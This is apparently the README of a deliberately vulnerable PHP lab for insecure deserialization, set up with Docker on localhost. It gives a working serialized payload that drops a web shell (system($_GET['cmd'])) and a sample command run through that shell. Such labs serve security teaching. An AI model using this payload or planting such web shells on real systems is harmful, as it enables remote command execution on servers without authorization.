User locally serializes some data and passes it to our app which uploads a shell.
Blindly accepts anything and runs unserialize()
Generates a serialized exploit
Git checkout this repo
cd into this repo
docker build -t insecure_deserialize:latest .
docker run -d insecure_deserialize:latest -p 33322:80
- First we serialize our payload with serialize.php
php serialize.php
- We then copy our payload and run it against our vulnerable site
- If the payload executes the screen will return white
http://localhost:33322/file.php?u=O:4:"File":2:{s:8:"filename";s:16:"simple_shell.php";s:7:"content";s:35:"<?php echo system($_GET['cmd']); ?>";}
- We now have a simple cmd shell on our host and can execute away
http://localhost:33322/simple_shell.php?cmd=ls -la